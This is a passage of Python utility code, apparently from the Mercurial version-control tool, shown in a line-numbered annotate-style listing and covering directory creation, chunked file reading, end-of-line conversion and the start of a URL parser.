2164 """recursive directory creation with parent mode inheritance
2164
2165
2165 Newly created directories are marked as "not to be indexed by
2166 Newly created directories are marked as "not to be indexed by
2166 the content indexing service", if ``notindexed`` is specified
2167 the content indexing service", if ``notindexed`` is specified
2167 for "write" mode access.
2168 for "write" mode access.
2168 """
2169 """
2169 try:
2170 try:
2170 makedir(name, notindexed)
2171 makedir(name, notindexed)
2171 except OSError as err:
2172 except OSError as err:
2172 if err.errno == errno.EEXIST:
2173 if err.errno == errno.EEXIST:
2173 return
2174 return
2174 if err.errno != errno.ENOENT or not name:
2175 if err.errno != errno.ENOENT or not name:
2175 raise
2176 raise
2176 parent = os.path.dirname(os.path.abspath(name))
2177 parent = os.path.dirname(os.path.abspath(name))
2177 if parent == name:
2178 if parent == name:
2178 raise
2179 raise
2179 makedirs(parent, mode, notindexed)
2180 makedirs(parent, mode, notindexed)
2180 try:
2181 try:
2181 makedir(name, notindexed)
2182 makedir(name, notindexed)
2182 except OSError as err:
2183 except OSError as err:
2183 # Catch EEXIST to handle races
2184 # Catch EEXIST to handle races
2184 if err.errno == errno.EEXIST:
2185 if err.errno == errno.EEXIST:
2185 return
2186 return
2186 raise
2187 raise
2187 if mode is not None:
2188 if mode is not None:
2188 os.chmod(name, mode)
2189 os.chmod(name, mode)
2189
2190
2190 def readfile(path):
2191 def readfile(path):
2191 with open(path, 'rb') as fp:
2192 with open(path, 'rb') as fp:
2192 return fp.read()
2193 return fp.read()
2193
2194
2194 def writefile(path, text):
2195 def writefile(path, text):
2195 with open(path, 'wb') as fp:
2196 with open(path, 'wb') as fp:
2196 fp.write(text)
2197 fp.write(text)
2197
2198
2198 def appendfile(path, text):
2199 def appendfile(path, text):
2199 with open(path, 'ab') as fp:
2200 with open(path, 'ab') as fp:
2200 fp.write(text)
2201 fp.write(text)
2201
2202
2202 class chunkbuffer(object):
2203 class chunkbuffer(object):
2203 """Allow arbitrary sized chunks of data to be efficiently read from an
2204 """Allow arbitrary sized chunks of data to be efficiently read from an
2204 iterator over chunks of arbitrary size."""
2205 iterator over chunks of arbitrary size."""
2205
2206
2206 def __init__(self, in_iter):
2207 def __init__(self, in_iter):
2207 """in_iter is the iterator that's iterating over the input chunks."""
2208 """in_iter is the iterator that's iterating over the input chunks."""
2208 def splitbig(chunks):
2209 def splitbig(chunks):
2209 for chunk in chunks:
2210 for chunk in chunks:
2210 if len(chunk) > 2**20:
2211 if len(chunk) > 2**20:
2211 pos = 0
2212 pos = 0
2212 while pos < len(chunk):
2213 while pos < len(chunk):
2213 end = pos + 2 ** 18
2214 end = pos + 2 ** 18
2214 yield chunk[pos:end]
2215 yield chunk[pos:end]
2215 pos = end
2216 pos = end
2216 else:
2217 else:
2217 yield chunk
2218 yield chunk
2218 self.iter = splitbig(in_iter)
2219 self.iter = splitbig(in_iter)
2219 self._queue = collections.deque()
2220 self._queue = collections.deque()
2220 self._chunkoffset = 0
2221 self._chunkoffset = 0
2221
2222
2222 def read(self, l=None):
2223 def read(self, l=None):
2223 """Read L bytes of data from the iterator of chunks of data.
2224 """Read L bytes of data from the iterator of chunks of data.
2224 Returns less than L bytes if the iterator runs dry.
2225 Returns less than L bytes if the iterator runs dry.
2225
2226
2226 If size parameter is omitted, read everything"""
2227 If size parameter is omitted, read everything"""
2227 if l is None:
2228 if l is None:
2228 return ''.join(self.iter)
2229 return ''.join(self.iter)
2229
2230
2230 left = l
2231 left = l
2231 buf = []
2232 buf = []
2232 queue = self._queue
2233 queue = self._queue
2233 while left > 0:
2234 while left > 0:
2234 # refill the queue
2235 # refill the queue
2235 if not queue:
2236 if not queue:
2236 target = 2**18
2237 target = 2**18
2237 for chunk in self.iter:
2238 for chunk in self.iter:
2238 queue.append(chunk)
2239 queue.append(chunk)
2239 target -= len(chunk)
2240 target -= len(chunk)
2240 if target <= 0:
2241 if target <= 0:
2241 break
2242 break
2242 if not queue:
2243 if not queue:
2243 break
2244 break
2244
2245
2245 # The easy way to do this would be to queue.popleft(), modify the
2246 # The easy way to do this would be to queue.popleft(), modify the
2246 # chunk (if necessary), then queue.appendleft(). However, for cases
2247 # chunk (if necessary), then queue.appendleft(). However, for cases
2247 # where we read partial chunk content, this incurs 2 dequeue
2248 # where we read partial chunk content, this incurs 2 dequeue
2248 # mutations and creates a new str for the remaining chunk in the
2249 # mutations and creates a new str for the remaining chunk in the
2249 # queue. Our code below avoids this overhead.
2250 # queue. Our code below avoids this overhead.
2250
2251
2251 chunk = queue[0]
2252 chunk = queue[0]
2252 chunkl = len(chunk)
2253 chunkl = len(chunk)
2253 offset = self._chunkoffset
2254 offset = self._chunkoffset
2254
2255
2255 # Use full chunk.
2256 # Use full chunk.
2256 if offset == 0 and left >= chunkl:
2257 if offset == 0 and left >= chunkl:
2257 left -= chunkl
2258 left -= chunkl
2258 queue.popleft()
2259 queue.popleft()
2259 buf.append(chunk)
2260 buf.append(chunk)
2260 # self._chunkoffset remains at 0.
2261 # self._chunkoffset remains at 0.
2261 continue
2262 continue
2262
2263
2263 chunkremaining = chunkl - offset
2264 chunkremaining = chunkl - offset
2264
2265
2265 # Use all of unconsumed part of chunk.
2266 # Use all of unconsumed part of chunk.
2266 if left >= chunkremaining:
2267 if left >= chunkremaining:
2267 left -= chunkremaining
2268 left -= chunkremaining
2268 queue.popleft()
2269 queue.popleft()
2269 # offset == 0 is enabled by block above, so this won't merely
2270 # offset == 0 is enabled by block above, so this won't merely
2270 # copy via ``chunk[0:]``.
2271 # copy via ``chunk[0:]``.
2271 buf.append(chunk[offset:])
2272 buf.append(chunk[offset:])
2272 self._chunkoffset = 0
2273 self._chunkoffset = 0
2273
2274
2274 # Partial chunk needed.
2275 # Partial chunk needed.
2275 else:
2276 else:
2276 buf.append(chunk[offset:offset + left])
2277 buf.append(chunk[offset:offset + left])
2277 self._chunkoffset += left
2278 self._chunkoffset += left
2278 left -= chunkremaining
2279 left -= chunkremaining
2279
2280
2280 return ''.join(buf)
2281 return ''.join(buf)
2281
2282
2282 def filechunkiter(f, size=131072, limit=None):
2283 def filechunkiter(f, size=131072, limit=None):
2283 """Create a generator that produces the data in the file size
2284 """Create a generator that produces the data in the file size
2284 (default 131072) bytes at a time, up to optional limit (default is
2285 (default 131072) bytes at a time, up to optional limit (default is
2285 to read all data). Chunks may be less than size bytes if the
2286 to read all data). Chunks may be less than size bytes if the
2286 chunk is the last chunk in the file, or the file is a socket or
2287 chunk is the last chunk in the file, or the file is a socket or
2287 some other type of file that sometimes reads less data than is
2288 some other type of file that sometimes reads less data than is
2288 requested."""
2289 requested."""
2289 assert size >= 0
2290 assert size >= 0
2290 assert limit is None or limit >= 0
2291 assert limit is None or limit >= 0
2291 while True:
2292 while True:
2292 if limit is None:
2293 if limit is None:
2293 nbytes = size
2294 nbytes = size
2294 else:
2295 else:
2295 nbytes = min(limit, size)
2296 nbytes = min(limit, size)
2296 s = nbytes and f.read(nbytes)
2297 s = nbytes and f.read(nbytes)
2297 if not s:
2298 if not s:
2298 break
2299 break
2299 if limit:
2300 if limit:
2300 limit -= len(s)
2301 limit -= len(s)
2301 yield s
2302 yield s
2302
2303
2303 class cappedreader(object):
2304 class cappedreader(object):
2304 """A file object proxy that allows reading up to N bytes.
2305 """A file object proxy that allows reading up to N bytes.
2305
2306
2306 Given a source file object, instances of this type allow reading up to
2307 Given a source file object, instances of this type allow reading up to
2307 N bytes from that source file object. Attempts to read past the allowed
2308 N bytes from that source file object. Attempts to read past the allowed
2308 limit are treated as EOF.
2309 limit are treated as EOF.
2309
2310
2310 It is assumed that I/O is not performed on the original file object
2311 It is assumed that I/O is not performed on the original file object
2311 in addition to I/O that is performed by this instance. If there is,
2312 in addition to I/O that is performed by this instance. If there is,
2312 state tracking will get out of sync and unexpected results will ensue.
2313 state tracking will get out of sync and unexpected results will ensue.
2313 """
2314 """
2314 def __init__(self, fh, limit):
2315 def __init__(self, fh, limit):
2315 """Allow reading up to <limit> bytes from <fh>."""
2316 """Allow reading up to <limit> bytes from <fh>."""
2316 self._fh = fh
2317 self._fh = fh
2317 self._left = limit
2318 self._left = limit
2318
2319
2319 def read(self, n=-1):
2320 def read(self, n=-1):
2320 if not self._left:
2321 if not self._left:
2321 return b''
2322 return b''
2322
2323
2323 if n < 0:
2324 if n < 0:
2324 n = self._left
2325 n = self._left
2325
2326
2326 data = self._fh.read(min(n, self._left))
2327 data = self._fh.read(min(n, self._left))
2327 self._left -= len(data)
2328 self._left -= len(data)
2328 assert self._left >= 0
2329 assert self._left >= 0
2329
2330
2330 return data
2331 return data
2331
2332
2332 def readinto(self, b):
2333 def readinto(self, b):
2333 res = self.read(len(b))
2334 res = self.read(len(b))
2334 if res is None:
2335 if res is None:
2335 return None
2336 return None
2336
2337
2337 b[0:len(res)] = res
2338 b[0:len(res)] = res
2338 return len(res)
2339 return len(res)
2339
2340
2340 def unitcountfn(*unittable):
2341 def unitcountfn(*unittable):
2341 '''return a function that renders a readable count of some quantity'''
2342 '''return a function that renders a readable count of some quantity'''
2342
2343
2343 def go(count):
2344 def go(count):
2344 for multiplier, divisor, format in unittable:
2345 for multiplier, divisor, format in unittable:
2345 if abs(count) >= divisor * multiplier:
2346 if abs(count) >= divisor * multiplier:
2346 return format % (count / float(divisor))
2347 return format % (count / float(divisor))
2347 return unittable[-1][2] % count
2348 return unittable[-1][2] % count
2348
2349
2349 return go
2350 return go
2350
2351
2351 def processlinerange(fromline, toline):
2352 def processlinerange(fromline, toline):
2352 """Check that linerange <fromline>:<toline> makes sense and return a
2353 """Check that linerange <fromline>:<toline> makes sense and return a
2353 0-based range.
2354 0-based range.
2354
2355
2355 >>> processlinerange(10, 20)
2356 >>> processlinerange(10, 20)
2356 (9, 20)
2357 (9, 20)
2357 >>> processlinerange(2, 1)
2358 >>> processlinerange(2, 1)
2358 Traceback (most recent call last):
2359 Traceback (most recent call last):
2359 ...
2360 ...
2360 ParseError: line range must be positive
2361 ParseError: line range must be positive
2361 >>> processlinerange(0, 5)
2362 >>> processlinerange(0, 5)
2362 Traceback (most recent call last):
2363 Traceback (most recent call last):
2363 ...
2364 ...
2364 ParseError: fromline must be strictly positive
2365 ParseError: fromline must be strictly positive
2365 """
2366 """
2366 if toline - fromline < 0:
2367 if toline - fromline < 0:
2367 raise error.ParseError(_("line range must be positive"))
2368 raise error.ParseError(_("line range must be positive"))
2368 if fromline < 1:
2369 if fromline < 1:
2369 raise error.ParseError(_("fromline must be strictly positive"))
2370 raise error.ParseError(_("fromline must be strictly positive"))
2370 return fromline - 1, toline
2371 return fromline - 1, toline
2371
2372
2372 bytecount = unitcountfn(
2373 bytecount = unitcountfn(
2373 (100, 1 << 30, _('%.0f GB')),
2374 (100, 1 << 30, _('%.0f GB')),
2374 (10, 1 << 30, _('%.1f GB')),
2375 (10, 1 << 30, _('%.1f GB')),
2375 (1, 1 << 30, _('%.2f GB')),
2376 (1, 1 << 30, _('%.2f GB')),
2376 (100, 1 << 20, _('%.0f MB')),
2377 (100, 1 << 20, _('%.0f MB')),
2377 (10, 1 << 20, _('%.1f MB')),
2378 (10, 1 << 20, _('%.1f MB')),
2378 (1, 1 << 20, _('%.2f MB')),
2379 (1, 1 << 20, _('%.2f MB')),
2379 (100, 1 << 10, _('%.0f KB')),
2380 (100, 1 << 10, _('%.0f KB')),
2380 (10, 1 << 10, _('%.1f KB')),
2381 (10, 1 << 10, _('%.1f KB')),
2381 (1, 1 << 10, _('%.2f KB')),
2382 (1, 1 << 10, _('%.2f KB')),
2382 (1, 1, _('%.0f bytes')),
2383 (1, 1, _('%.0f bytes')),
2383 )
2384 )
2384
2385
2385 class transformingwriter(object):
2386 class transformingwriter(object):
2386 """Writable file wrapper to transform data by function"""
2387 """Writable file wrapper to transform data by function"""
2387
2388
2388 def __init__(self, fp, encode):
2389 def __init__(self, fp, encode):
2389 self._fp = fp
2390 self._fp = fp
2390 self._encode = encode
2391 self._encode = encode
2391
2392
2392 def close(self):
2393 def close(self):
2393 self._fp.close()
2394 self._fp.close()
2394
2395
2395 def flush(self):
2396 def flush(self):
2396 self._fp.flush()
2397 self._fp.flush()
2397
2398
2398 def write(self, data):
2399 def write(self, data):
2399 return self._fp.write(self._encode(data))
2400 return self._fp.write(self._encode(data))
2400
2401
2401 # Matches a single EOL which can either be a CRLF where repeated CR
2402 # Matches a single EOL which can either be a CRLF where repeated CR
2402 # are removed or a LF. We do not care about old Macintosh files, so a
2403 # are removed or a LF. We do not care about old Macintosh files, so a
2403 # stray CR is an error.
2404 # stray CR is an error.
2404 _eolre = remod.compile(br'\r*\n')
2405 _eolre = remod.compile(br'\r*\n')
2405
2406
2406 def tolf(s):
2407 def tolf(s):
2407 return _eolre.sub('\n', s)
2408 return _eolre.sub('\n', s)
2408
2409
2409 def tocrlf(s):
2410 def tocrlf(s):
2410 return _eolre.sub('\r\n', s)
2411 return _eolre.sub('\r\n', s)
2411
2412
2412 def _crlfwriter(fp):
2413 def _crlfwriter(fp):
2413 return transformingwriter(fp, tocrlf)
2414 return transformingwriter(fp, tocrlf)
2414
2415
2415 if pycompat.oslinesep == '\r\n':
2416 if pycompat.oslinesep == '\r\n':
2416 tonativeeol = tocrlf
2417 tonativeeol = tocrlf
2417 fromnativeeol = tolf
2418 fromnativeeol = tolf
2418 nativeeolwriter = _crlfwriter
2419 nativeeolwriter = _crlfwriter
2419 else:
2420 else:
2420 tonativeeol = pycompat.identity
2421 tonativeeol = pycompat.identity
2421 fromnativeeol = pycompat.identity
2422 fromnativeeol = pycompat.identity
2422 nativeeolwriter = pycompat.identity
2423 nativeeolwriter = pycompat.identity
2423
2424
2424 if (pyplatform.python_implementation() == 'CPython' and
2425 if (pyplatform.python_implementation() == 'CPython' and
2425 sys.version_info < (3, 0)):
2426 sys.version_info < (3, 0)):
2426 # There is an issue in CPython that some IO methods do not handle EINTR
2427 # There is an issue in CPython that some IO methods do not handle EINTR
2427 # correctly. The following table shows what CPython version (and functions)
2428 # correctly. The following table shows what CPython version (and functions)
2428 # are affected (buggy: has the EINTR bug, okay: otherwise):
2429 # are affected (buggy: has the EINTR bug, okay: otherwise):
2429 #
2430 #
2430 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2431 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2431 # --------------------------------------------------
2432 # --------------------------------------------------
2432 # fp.__iter__ | buggy | buggy | okay
2433 # fp.__iter__ | buggy | buggy | okay
2433 # fp.read* | buggy | okay [1] | okay
2434 # fp.read* | buggy | okay [1] | okay
2434 #
2435 #
2435 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2436 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2436 #
2437 #
2437 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2438 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2438 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2439 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2439 #
2440 #
2440 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2441 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2441 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2442 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2442 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2443 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2443 # fp.__iter__ but not other fp.read* methods.
2444 # fp.__iter__ but not other fp.read* methods.
2444 #
2445 #
2445 # On modern systems like Linux, the "read" syscall cannot be interrupted
2446 # On modern systems like Linux, the "read" syscall cannot be interrupted
2446 # when reading "fast" files like on-disk files. So the EINTR issue only
2447 # when reading "fast" files like on-disk files. So the EINTR issue only
2447 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2448 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2448 # files approximately as "fast" files and use the fast (unsafe) code path,
2449 # files approximately as "fast" files and use the fast (unsafe) code path,
2449 # to minimize the performance impact.
2450 # to minimize the performance impact.
2450 if sys.version_info >= (2, 7, 4):
2451 if sys.version_info >= (2, 7, 4):
2451 # fp.readline deals with EINTR correctly, use it as a workaround.
2452 # fp.readline deals with EINTR correctly, use it as a workaround.
2452 def _safeiterfile(fp):
2453 def _safeiterfile(fp):
2453 return iter(fp.readline, '')
2454 return iter(fp.readline, '')
2454 else:
2455 else:
2455 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2456 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2456 # note: this may block longer than necessary because of bufsize.
2457 # note: this may block longer than necessary because of bufsize.
2457 def _safeiterfile(fp, bufsize=4096):
2458 def _safeiterfile(fp, bufsize=4096):
2458 fd = fp.fileno()
2459 fd = fp.fileno()
2459 line = ''
2460 line = ''
2460 while True:
2461 while True:
2461 try:
2462 try:
2462 buf = os.read(fd, bufsize)
2463 buf = os.read(fd, bufsize)
2463 except OSError as ex:
2464 except OSError as ex:
2464 # os.read only raises EINTR before any data is read
2465 # os.read only raises EINTR before any data is read
2465 if ex.errno == errno.EINTR:
2466 if ex.errno == errno.EINTR:
2466 continue
2467 continue
2467 else:
2468 else:
2468 raise
2469 raise
2469 line += buf
2470 line += buf
2470 if '\n' in buf:
2471 if '\n' in buf:
2471 splitted = line.splitlines(True)
2472 splitted = line.splitlines(True)
2472 line = ''
2473 line = ''
2473 for l in splitted:
2474 for l in splitted:
2474 if l[-1] == '\n':
2475 if l[-1] == '\n':
2475 yield l
2476 yield l
2476 else:
2477 else:
2477 line = l
2478 line = l
2478 if not buf:
2479 if not buf:
2479 break
2480 break
2480 if line:
2481 if line:
2481 yield line
2482 yield line
2482
2483
2483 def iterfile(fp):
2484 def iterfile(fp):
2484 fastpath = True
2485 fastpath = True
2485 if type(fp) is file:
2486 if type(fp) is file:
2486 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2487 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2487 if fastpath:
2488 if fastpath:
2488 return fp
2489 return fp
2489 else:
2490 else:
2490 return _safeiterfile(fp)
2491 return _safeiterfile(fp)
2491 else:
2492 else:
2492 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2493 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2493 def iterfile(fp):
2494 def iterfile(fp):
2494 return fp
2495 return fp
2495
2496
2496 def iterlines(iterator):
2497 def iterlines(iterator):
2497 for chunk in iterator:
2498 for chunk in iterator:
2498 for line in chunk.splitlines():
2499 for line in chunk.splitlines():
2499 yield line
2500 yield line
2500
2501
2501 def expandpath(path):
2502 def expandpath(path):
2502 return os.path.expanduser(os.path.expandvars(path))
2503 return os.path.expanduser(os.path.expandvars(path))
2503
2504
2504 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2505 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2505 """Return the result of interpolating items in the mapping into string s.
2506 """Return the result of interpolating items in the mapping into string s.
2506
2507
2507 prefix is a single character string, or a two character string with
2508 prefix is a single character string, or a two character string with
2508 a backslash as the first character if the prefix needs to be escaped in
2509 a backslash as the first character if the prefix needs to be escaped in
2509 a regular expression.
2510 a regular expression.
2510
2511
2511 fn is an optional function that will be applied to the replacement text
2512 fn is an optional function that will be applied to the replacement text
2512 just before replacement.
2513 just before replacement.
2513
2514
2514 escape_prefix is an optional flag that allows using doubled prefix for
2515 escape_prefix is an optional flag that allows using doubled prefix for
2515 its escaping.
2516 its escaping.
2516 """
2517 """
2517 fn = fn or (lambda s: s)
2518 fn = fn or (lambda s: s)
2518 patterns = '|'.join(mapping.keys())
2519 patterns = '|'.join(mapping.keys())
2519 if escape_prefix:
2520 if escape_prefix:
2520 patterns += '|' + prefix
2521 patterns += '|' + prefix
2521 if len(prefix) > 1:
2522 if len(prefix) > 1:
2522 prefix_char = prefix[1:]
2523 prefix_char = prefix[1:]
2523 else:
2524 else:
2524 prefix_char = prefix
2525 prefix_char = prefix
2525 mapping[prefix_char] = prefix_char
2526 mapping[prefix_char] = prefix_char
2526 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2527 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2527 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2528 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2528
2529
2529 def getport(port):
2530 def getport(port):
2530 """Return the port for a given network service.
2531 """Return the port for a given network service.
2531
2532
2532 If port is an integer, it's returned as is. If it's a string, it's
2533 If port is an integer, it's returned as is. If it's a string, it's
2533 looked up using socket.getservbyname(). If there's no matching
2534 looked up using socket.getservbyname(). If there's no matching
2534 service, error.Abort is raised.
2535 service, error.Abort is raised.
2535 """
2536 """
2536 try:
2537 try:
2537 return int(port)
2538 return int(port)
2538 except ValueError:
2539 except ValueError:
2539 pass
2540 pass
2540
2541
2541 try:
2542 try:
2542 return socket.getservbyname(pycompat.sysstr(port))
2543 return socket.getservbyname(pycompat.sysstr(port))
2543 except socket.error:
2544 except socket.error:
2544 raise error.Abort(_("no port number associated with service '%s'")
2545 raise error.Abort(_("no port number associated with service '%s'")
2545 % port)
2546 % port)
2546
2547
2547 class url(object):
2548 class url(object):
2548 r"""Reliable URL parser.
2549 r"""Reliable URL parser.
2549
2550
2550 This parses URLs and provides attributes for the following
2551 This parses URLs and provides attributes for the following
2551 components:
2552 components:
2552
2553
2553 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2554 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2554
2555
2555 Missing components are set to None. The only exception is
2556 Missing components are set to None. The only exception is
2556 fragment, which is set to '' if present but empty.
2557 fragment, which is set to '' if present but empty.
2557
2558
2558 If parsefragment is False, fragment is included in query. If
2559 If parsefragment is False, fragment is included in query. If
2559 parsequery is False, query is included in path. If both are
2560 parsequery is False, query is included in path. If both are
2560 False, both fragment and query are included in path.
2561 False, both fragment and query are included in path.
2561
2562
2562 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2563 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2563
2564
2564 Note that for backward compatibility reasons, bundle URLs do not
2565 Note that for backward compatibility reasons, bundle URLs do not
2565 take host names. That means 'bundle://../' has a path of '../'.
2566 take host names. That means 'bundle://../' has a path of '../'.
2566
2567
2567 Examples:
2568 Examples:
2568
2569
2569 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2570 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2570 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2571 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2571 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2572 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2572 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2573 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2573 >>> url(b'file:///home/joe/repo')
2574 >>> url(b'file:///home/joe/repo')
2574 <url scheme: 'file', path: '/home/joe/repo'>
2575 <url scheme: 'file', path: '/home/joe/repo'>
2575 >>> url(b'file:///c:/temp/foo/')
2576 >>> url(b'file:///c:/temp/foo/')
2576 <url scheme: 'file', path: 'c:/temp/foo/'>
2577 <url scheme: 'file', path: 'c:/temp/foo/'>
2577 >>> url(b'bundle:foo')
2578 >>> url(b'bundle:foo')
2578 <url scheme: 'bundle', path: 'foo'>
2579 <url scheme: 'bundle', path: 'foo'>
2579 >>> url(b'bundle://../foo')
2580 >>> url(b'bundle://../foo')
2580 <url scheme: 'bundle', path: '../foo'>
2581 <url scheme: 'bundle', path: '../foo'>
2581 >>> url(br'c:\foo\bar')
2582 >>> url(br'c:\foo\bar')
2582 <url path: 'c:\\foo\\bar'>
2583 <url path: 'c:\\foo\\bar'>
2583 >>> url(br'\\blah\blah\blah')
2584 >>> url(br'\\blah\blah\blah')
2584 <url path: '\\\\blah\\blah\\blah'>
2585 <url path: '\\\\blah\\blah\\blah'>
2585 >>> url(br'\\blah\blah\blah#baz')
2586 >>> url(br'\\blah\blah\blah#baz')
2586 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2587 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2587 >>> url(br'file:///C:\users\me')
2588 >>> url(br'file:///C:\users\me')
2588 <url scheme: 'file', path: 'C:\\users\\me'>
2589 <url scheme: 'file', path: 'C:\\users\\me'>
2589
2590
2590 Authentication credentials:
2591 Authentication credentials:
2591
2592
2592 >>> url(b'ssh://joe:xyz@x/repo')
2593 >>> url(b'ssh://joe:xyz@x/repo')
2593 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2594 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2594 >>> url(b'ssh://joe@x/repo')
2595 >>> url(b'ssh://joe@x/repo')
2595 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2596 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2596
2597
2597 Query strings and fragments:
2598 Query strings and fragments:
2598
2599
2599 >>> url(b'http://host/a?b#c')
2600 >>> url(b'http://host/a?b#c')
2600 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2601 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2601 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2602 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2602 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2603 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2603
2604
2604 Empty path:
2605 Empty path:
2605
2606
2606 >>> url(b'')
2607 >>> url(b'')
2607 <url path: ''>
2608 <url path: ''>
2608 >>> url(b'#a')
2609 >>> url(b'#a')
2609 <url path: '', fragment: 'a'>
2610 <url path: '', fragment: 'a'>
2610 >>> url(b'http://host/')
2611 >>> url(b'http://host/')
2611 <url scheme: 'http', host: 'host', path: ''>
2612 <url scheme: 'http', host: 'host', path: ''>
2612 >>> url(b'http://host/#a')
2613 >>> url(b'http://host/#a')
2613 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2614 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2614
2615
2615 Only scheme:
2616 Only scheme:
2616
2617
2617 >>> url(b'http:')
2618 >>> url(b'http:')
2618 <url scheme: 'http'>
2619 <url scheme: 'http'>
2619 """
2620 """
2620
2621
2621 _safechars = "!~*'()+"
2622 _safechars = "!~*'()+"
2622 _safepchars = "/!~*'()+:\\"
2623 _safepchars = "/!~*'()+:\\"
2623 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2624 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2624
2625
2625 def __init__(self, path, parsequery=True, parsefragment=True):
2626 def __init__(self, path, parsequery=True, parsefragment=True):
2626 # We slowly chomp away at path until we have only the path left
2627 # We slowly chomp away at path until we have only the path left
2627 self.scheme = self.user = self.passwd = self.host = None
2628 self.scheme = self.user = self.passwd = self.host = None
2628 self.port = self.path = self.query = self.fragment = None
2629 self.port = self.path = self.query = self.fragment = None
2629 self._localpath = True
2630 self._localpath = True
2630 self._hostport = ''
2631 self._hostport = ''
2631 self._origpath = path
2632 self._origpath = path
2632
2633
2633 if parsefragment and '#' in path:
2634 if parsefragment and '#' in path:
2634 path, self.fragment = path.split('#', 1)
2635 path, self.fragment = path.split('#', 1)
2635
2636
2636 # special case for Windows drive letters and UNC paths
2637 # special case for Windows drive letters and UNC paths
2637 if hasdriveletter(path) or path.startswith('\\\\'):
2638 if hasdriveletter(path) or path.startswith('\\\\'):
2638 self.path = path
2639 self.path = path
2639 return
2640 return
2640
2641
2641 # For compatibility reasons, we can't handle bundle paths as
2642 # For compatibility reasons, we can't handle bundle paths as
2642 # normal URLS
2643 # normal URLS
2643 if path.startswith('bundle:'):
2644 if path.startswith('bundle:'):
2644 self.scheme = 'bundle'
2645 self.scheme = 'bundle'
2645 path = path[7:]
2646 path = path[7:]
2646 if path.startswith('//'):
2647 if path.startswith('//'):
2647 path = path[2:]
2648 path = path[2:]
2648 self.path = path
2649 self.path = path
2649 return
2650 return
2650
2651
2651 if self._matchscheme(path):
2652 if self._matchscheme(path):
2652 parts = path.split(':', 1)
2653 parts = path.split(':', 1)
2653 if parts[0]:
2654 if parts[0]:
2654 self.scheme, path = parts
2655 self.scheme, path = parts
2655 self._localpath = False
2656 self._localpath = False
2656
2657
2657 if not path:
2658 if not path:
2658 path = None
2659 path = None
2659 if self._localpath:
2660 if self._localpath:
2660 self.path = ''
2661 self.path = ''
2661 return
2662 return
2662 else:
2663 else:
2663 if self._localpath:
2664 if self._localpath:
2664 self.path = path
2665 self.path = path
2665 return
2666 return
2666
2667
2667 if parsequery and '?' in path:
2668 if parsequery and '?' in path:
2668 path, self.query = path.split('?', 1)
2669 path, self.query = path.split('?', 1)
2669 if not path:
2670 if not path:
2670 path = None
2671 path = None
2671 if not self.query:
2672 if not self.query:
2672 self.query = None
2673 self.query = None
2673
2674
2674 # // is required to specify a host/authority
2675 # // is required to specify a host/authority
2675 if path and path.startswith('//'):
2676 if path and path.startswith('//'):
2676 parts = path[2:].split('/', 1)
2677 parts = path[2:].split('/', 1)
2677 if len(parts) > 1:
2678 if len(parts) > 1:
2678 self.host, path = parts
2679 self.host, path = parts
2679 else:
2680 else:
2680 self.host = parts[0]
2681 self.host = parts[0]
2681 path = None
2682 path = None
2682 if not self.host:
2683 if not self.host:
2683 self.host = None
2684 self.host = None
2684 # path of file:///d is /d
2685 # path of file:///d is /d
2685 # path of file:///d:/ is d:/, not /d:/
